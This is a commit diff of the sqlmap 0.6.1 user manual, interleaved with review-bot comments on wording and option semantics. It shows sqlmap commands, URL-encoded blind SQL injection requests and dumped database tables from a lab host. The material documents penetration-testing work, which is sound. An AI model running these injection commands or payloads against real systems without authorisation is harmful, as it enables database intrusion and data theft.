Updated site, documentation (dev and user) and packaging scripts for 0.6.1

This commit is contained in:
Bernardo Damele
2008-10-20 13:43:18 +00:00
parent 6ddb5afef9
commit fcc16b2346
6 changed files with 292 additions and 102 deletions


@@ -245,8 +245,8 @@ those that vary the HTTP response page content.
On the dynamic ones sqlmap automatically tests and detects the ones
affected by SQL injection. Each dynamic parameter is tested for
<EM>numeric</EM>, <EM>single quoted string</EM>, <EM>double quoted
string</EM> and all of these three datatypes with zero, one and two
parenthesis to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
string</EM> and all of these three datatypes with zero to two parenthesis
to correctly detect which is the <CODE>SELECT</CODE> statement syntax to
perform further injections with. It is also possible to specify the
parameter(s) that you want to perform tests and use for injection on.</LI>
<LI>Option to specify the <B>maximum number of concurrent HTTP
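Review bot: the rewritten sentence keeps the singular "parenthesis" where the plural is meant ("zero to two parentheses"); the same word recurs in the original wording being replaced, so this is the moment to fix it. Suggest "all of these three datatypes with zero to two parentheses to correctly detect which is the SELECT statement syntax".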
@@ -277,6 +277,9 @@ and <B>resume the injection from this file in a second time</B>.</LI>
<LI>Support to read options from a configuration INI file rather than
specify each time all of the options on the command line. Support also to
save command line options on a configuration INI file.</LI>
<LI>Integration with other IT security related open source projects,
<A HREF="http://metasploit.com/framework/">Metasploit</A> and
<A HREF="http://w3af.sourceforge.net/">w3af</A>.</LI>
<LI><B>PHP setting <CODE>magic_quotes_gpc</CODE> bypass</B> by encoding
every query string, between single quotes, with <CODE>CHAR</CODE>, or similar,
database management system function.</LI>
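Review bot: the new feature bullet claims "Integration with other IT security related open source projects, Metasploit and w3af" but says nothing about what the integration consists of or where it is documented. Suggest either one clause naming the mechanism (which option or output the other tool consumes) or a link to the relevant section of the user manual, so the bullet is verifiable rather than a bare name-drop. Minor: "IT security related" reads better hyphenated as "IT-security-related".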
@@ -292,19 +295,19 @@ It is available in various formats:</P>
<P>
<UL>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.gz">Source gzip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.bz2">Source bzip2 compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1.zip">Source zip compressed</A> operating system independent.</LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.zip">Source zip compressed</A> operating system independent.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1-1_all.deb">DEB binary package</A> architecture independent for Debian and any
other Debian derivated GNU/Linux distribution.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1-1.noarch.rpm">RPM binary package</A> architecture independent for Fedora and any
other operating system that can install RPM packages.</LI>
<LI>
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
<A HREF="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1_exe.zip">Portable executable for Windows</A> that <B>does not require the Python
interpreter</B> to be installed on the operating system.</LI>
</UL>
</P>
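Review bot: the version in all six download links goes from 0.6.1.1 to 0.6.1, which matches the commit message, but it is worth confirming the packaging scripts in this same commit produce exactly these artifact names (sqlmap_0.6.1-1_all.deb, sqlmap-0.6.1-1.noarch.rpm, sqlmap-0.6.1_exe.zip), since a mismatch turns every link here into a 404. While touching this block, the unchanged context line "any other Debian derivated GNU/Linux distribution" should read "Debian-derived".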
@@ -331,7 +334,7 @@ and
<PRE>
$ python sqlmap.py -h
sqlmap/0.6.1.1 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
sqlmap/0.6.1 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
and Daniele Bellucci &lt;daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u &lt;URL> | -g &lt;google dork> | -c &lt;config file>}
@@ -379,13 +382,16 @@ Options:
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C)
--dump Dump DBMS database table entries (req: -T, -D opt: -C,
--start, --stop)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First table entry to dump
--stop=LIMITSTOP Last table entry to dump
--sql-query=QUERY SQL SELECT query to be executed
--sql-shell Prompt for an interactive SQL shell
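Review bot: the two new help lines "--start=LIMITSTART First table entry to dump" and "--stop=LIMITSTOP Last table entry to dump" do not say whether the bounds are 1-based or inclusive, and the placeholder names suggest these map onto a SQL LIMIT/OFFSET rather than onto a column value. Since the `--dump` line now advertises them as optional, suggest stating the semantics in the help text, e.g. "First table entry to dump (1-based, inclusive)", so a user does not have to infer it from the manual's example.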
@@ -417,6 +423,7 @@ Options:
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</PRE>
</CODE></BLOCKQUOTE>
</P>
@@ -528,7 +535,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:28] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:29] [INFO] testing MySQL
@@ -537,7 +544,7 @@ Connection: close
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%207994=7994&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
</PRE>
@@ -555,7 +562,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:32] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:32] [TRAFFIC IN] HTTP response (OK - 200):
@@ -573,7 +580,7 @@ Content-Type: text/html
GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20
CHAR%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%204435=4435&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:33] [TRAFFIC IN] HTTP response (OK - 200):
@@ -600,7 +607,7 @@ $ python sqlmap.py -u http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat
[hh:mm:23] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.1.1 (http://sqlmap.sourceforge.net)
User-agent: sqlmap/0.6.1 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:23] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2042,7 +2049,8 @@ is connected to, which is always <CODE>public</CODE>.</P>
<H3>Dump database tables entries</H3>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE> and <CODE>-D</CODE></P>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
<CODE>--start</CODE> and <CODE>--stop</CODE></P>
<P>It is possible to dump the entries for a specific database table.
This functionality depends on both <CODE>-T</CODE> to specify the table name
@@ -2058,15 +2066,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
| 5 | NULL | nameisnull |
+----+----------------------------------------------+-------------------+
</PRE>
</CODE></BLOCKQUOTE>
</P>
@@ -2112,15 +2120,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;ca
Database: public
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | | nameisnull |
+----+--------------------------------------------+-------------------+
| 5 | | nameisnull |
+----+----------------------------------------------+-------------------+
[hh:mm:59] [INFO] Table 'public.users' dumped to CSV file '/software/sqlmap/output/
192.168.1.121/dump/public/users.csv'
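Review bot: in this PostgreSQL dump entry 5 is rendered with an empty name column, whereas the MySQL dump of the same table earlier in this commit prints "NULL" for the same row. If that difference is how sqlmap renders NULL values on the two back-ends it deserves a sentence in the docs; if not, one of the two examples is stale and should be regenerated so the manual does not show two outputs for the same data.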
@@ -2138,6 +2146,40 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
</CODE></BLOCKQUOTE>
</P>
<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE> option
to limit the dump to a range of entries.</P>
<P>
<UL>
<LI><CODE>--start</CODE> specifies the first entry to enumerate</LI>
<LI><CODE>--stop</CODE> specifies the last entry to enumerate</LI>
</UL>
</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" --dump \
-T users -D test --start 2 --stop 4
Database: test
Table: users
[3 entries]
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
+----+----------------------------------------------+-------------------+
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, sqlmap is very flexible: you can leave it automatically
enumerate the whole database table up to a single column of a specific
table entry.</P>
<H3>Dump all databases tables entries</H3>
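Review bot: the new bullets describe `--start` as "the first entry to enumerate" and `--stop` as "the last entry to enumerate", but the section is about dumping, and the example (`--start 2 --stop 4` yielding 3 entries with ids 2, 3 and 4) only works as an illustration because in this table the row position coincides with the `id` value. Given the LIMITSTART/LIMITSTOP placeholders in the help text and the Microsoft SQL Server dump later in this commit, where rows come back in the order 4, 2, 1, 3, 5, suggest saying explicitly that the range is by row position in the result set (inclusive), not by `id`, so readers do not expect `--start 2 --stop 4` to select ids 2 to 4 on every DBMS.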
@@ -2153,15 +2195,15 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;ca
Database: test
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 1 | luther | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
| 5 | NULL | nameisnull |
+----+----------------------------------------------+-------------------+
Database: information_schema
Table: CHARACTER_SETS
@@ -2246,15 +2288,15 @@ Table: spt_datatype_info_ext
Database: master
Table: users
[5 entries]
+----+--------------------------------------------+-------------------+
| id | name | surname |
+----+--------------------------------------------+-------------------+
+----+----------------------------------------------+-------------------+
| id | name | surname |
+----+----------------------------------------------+-------------------+
| 4 | sqlmap/0.6.1 (http://sqlmap.sourceforge.net) | user agent header |
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
| 5 | NULL | nameisnull |
+----+--------------------------------------------+-------------------+
| 2 | fluffy | bunny |
| 1 | luther | blisset |
| 3 | wu | ming |
| 5 | NULL | nameisnull |
+----+----------------------------------------------+-------------------+
[...]
</PRE>
@@ -3123,7 +3165,8 @@ back-end DBMS: MySQL >= 5.0.0
<P>Option: <CODE>--save</CODE></P>
<P>It is possible to save the command line options to a configuration INI
file.</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
@@ -3231,6 +3274,53 @@ banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.
</P>
<H3>Act in non-interactive mode</H3>
<P>Option: <CODE>--batch</CODE></P>
<P>If you want sqlmap to run as a batch tool, without interacting with you in
case of a choice has to be done, you can force it by using <CODE>--batch</CODE>
option than letting sqlmap go for a default behaviour.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_str.php?id=1&amp;name=luther" -v 1 \
--batch
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
[hh:mm:22] [INFO] GET parameter 'name' is dynamic
[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go ahead:
[0] place: GET, parameter: id, type: numeric (default)
[1] place: GET, parameter: name, type: stringsingle
[q] Quit
Choice: 0
[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
[...]
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, sqlmap choosed automatically to injection on the first
vulnerable parameter which is the default behaviour.</P>
<H2><A NAME="s6">6.</A> <A HREF="#toc6">Disclaimer</A></H2>
<P>sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
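Review bot: the new `--batch` paragraph needs a grammar pass before it ships: "without interacting with you in case of a choice has to be done, you can force it by using --batch option than letting sqlmap go for a default behaviour" should read along the lines of "without prompting you whenever a choice has to be made, use the --batch option and sqlmap will apply the default behaviour"; likewise the closing sentence "sqlmap choosed automatically to injection on the first vulnerable parameter" should be "sqlmap automatically chose to inject on the first vulnerable parameter". The example only shows the default for the injection-point prompt (choice 0); since the help text says `--batch` means "Never ask for user input", a sentence stating that every other prompt likewise takes its marked default would make the option's behaviour predictable for unattended runs.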